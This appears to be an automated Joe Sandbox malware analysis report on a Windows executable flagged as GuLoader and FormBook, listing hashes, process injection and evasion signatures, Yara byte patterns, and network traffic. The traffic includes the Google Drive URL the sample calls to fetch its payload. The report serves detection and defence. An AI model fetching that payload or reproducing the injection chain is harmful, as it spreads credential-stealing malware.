Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rpedido-00035.exe

Overview

General Information

Sample name:rpedido-00035.exe
Analysis ID:1526071
MD5:13de5fefd3dda5e310cde2fa1e6d4b32
SHA1:3e54744b089154a3a90ebe930ae8af45879e88a9
SHA256:7861c46cbb414dbcc6aa51977b94c3532391afa08aaa9907f865e51eb95422b0
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • rpedido-00035.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\rpedido-00035.exe" MD5: 13DE5FEFD3DDA5E310CDE2FA1E6D4B32)
    • rpedido-00035.exe (PID: 1532 cmdline: "C:\Users\user\Desktop\rpedido-00035.exe" MD5: 13DE5FEFD3DDA5E310CDE2FA1E6D4B32)
      • RAVCpl64.exe (PID: 4296 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • sethc.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\sethc.exe" MD5: AA9A6E4DADA121001CFDF184B9758BBE)
          • explorer.exe (PID: 1648 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.TigJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Temp\nszDD94.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T17:25:15.462505+020028032702Potentially Bad Traffic192.168.11.2049775142.250.65.206443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rpedido-00035.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: rpedido-00035.exeReversingLabs: Detection: 18%
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: rpedido-00035.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.65.206:443 -> 192.168.11.20:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49776 version: TLS 1.2
            Source: rpedido-00035.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rpedido-00035.exe, rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4x nop then mov ebx, 00000004h4_2_043D04DF
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49775 -> 142.250.65.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: rpedido-00035.exe, 00000000.00000000.43566865335.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000002.00000000.44420461178.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.gom
            Source: rpedido-00035.exe, 00000002.00000003.44817366771.0000000005BEB000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881571873.0000000005F00000.00000004.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX
            Source: rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX1
            Source: rpedido-00035.exe, 00000002.00000002.44880863640.0000000005BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IXxe
            Source: rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: rpedido-00035.exe, 00000002.00000003.44783272355.0000000005C24000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881124399.0000000005C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=downloadtY
            Source: rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownHTTPS traffic detected: 142.250.65.206:443 -> 192.168.11.20:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49776 version: TLS 1.2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360534E0 NtCreateMutant,LdrInitializeThunk,2_2_360534E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36052EB0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36052B90
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36052BC0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36054570 NtSuspendThread,2_2_36054570
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36054260 NtSetContextThread,2_2_36054260
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052E00 NtQueueApcThread,2_2_36052E00
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052E50 NtCreateSection,2_2_36052E50
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052E80 NtCreateProcessEx,2_2_36052E80
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052EC0 NtQuerySection,2_2_36052EC0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052ED0 NtResumeThread,2_2_36052ED0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052F00 NtCreateFile,2_2_36052F00
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052F30 NtOpenDirectoryObject,2_2_36052F30
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052FB0 NtSetValueKey,2_2_36052FB0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052C10 NtOpenProcess,2_2_36052C10
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052C20 NtSetInformationFile,2_2_36052C20
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052C30 NtMapViewOfSection,2_2_36052C30
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36053C30 NtOpenProcessToken,2_2_36053C30
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052C50 NtUnmapViewOfSection,2_2_36052C50
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36053C90 NtOpenThread,2_2_36053C90
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052CD0 NtEnumerateKey,2_2_36052CD0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052CF0 NtDelayExecution,2_2_36052CF0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052D10 NtQuerySystemInformation,2_2_36052D10
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052D50 NtWriteVirtualMemory,2_2_36052D50
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052DA0 NtReadVirtualMemory,2_2_36052DA0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052DC0 NtAdjustPrivilegesToken,2_2_36052DC0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052A10 NtWriteFile,2_2_36052A10
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052A80 NtClose,2_2_36052A80
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052AA0 NtQueryInformationFile,2_2_36052AA0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052AC0 NtEnumerateValueKey,2_2_36052AC0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052B00 NtQueryValueKey,2_2_36052B00
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052B10 NtAllocateVirtualMemory,2_2_36052B10
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052B20 NtQueryInformationProcess,2_2_36052B20
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045034E0 NtCreateMutant,LdrInitializeThunk,4_2_045034E0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502C30 NtMapViewOfSection,LdrInitializeThunk,4_2_04502C30
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502CF0 NtDelayExecution,LdrInitializeThunk,4_2_04502CF0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_04502D10
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502E50 NtCreateSection,LdrInitializeThunk,4_2_04502E50
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502F00 NtCreateFile,LdrInitializeThunk,4_2_04502F00
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045029F0 NtReadFile,LdrInitializeThunk,4_2_045029F0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502A80 NtClose,LdrInitializeThunk,4_2_04502A80
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04502B10
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502B00 NtQueryValueKey,LdrInitializeThunk,4_2_04502B00
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_04502BC0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04502B90
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502B80 NtCreateKey,LdrInitializeThunk,4_2_04502B80
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04504570 NtSuspendThread,4_2_04504570
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04504260 NtSetContextThread,4_2_04504260
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502C50 NtUnmapViewOfSection,4_2_04502C50
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502C10 NtOpenProcess,4_2_04502C10
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04503C30 NtOpenProcessToken,4_2_04503C30
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502C20 NtSetInformationFile,4_2_04502C20
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502CD0 NtEnumerateKey,4_2_04502CD0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04503C90 NtOpenThread,4_2_04503C90
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502D50 NtWriteVirtualMemory,4_2_04502D50
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502DC0 NtAdjustPrivilegesToken,4_2_04502DC0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502DA0 NtReadVirtualMemory,4_2_04502DA0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502E00 NtQueueApcThread,4_2_04502E00
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502ED0 NtResumeThread,4_2_04502ED0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502EC0 NtQuerySection,4_2_04502EC0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502E80 NtCreateProcessEx,4_2_04502E80
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502EB0 NtProtectVirtualMemory,4_2_04502EB0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502F30 NtOpenDirectoryObject,4_2_04502F30
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502FB0 NtSetValueKey,4_2_04502FB0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045038D0 NtGetContextThread,4_2_045038D0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_045029D0 NtWaitForSingleObject,4_2_045029D0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502A10 NtWriteFile,4_2_04502A10
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502AC0 NtEnumerateValueKey,4_2_04502AC0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502AA0 NtQueryInformationFile,4_2_04502AA0
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_04502B20 NtQueryInformationProcess,4_2_04502B20
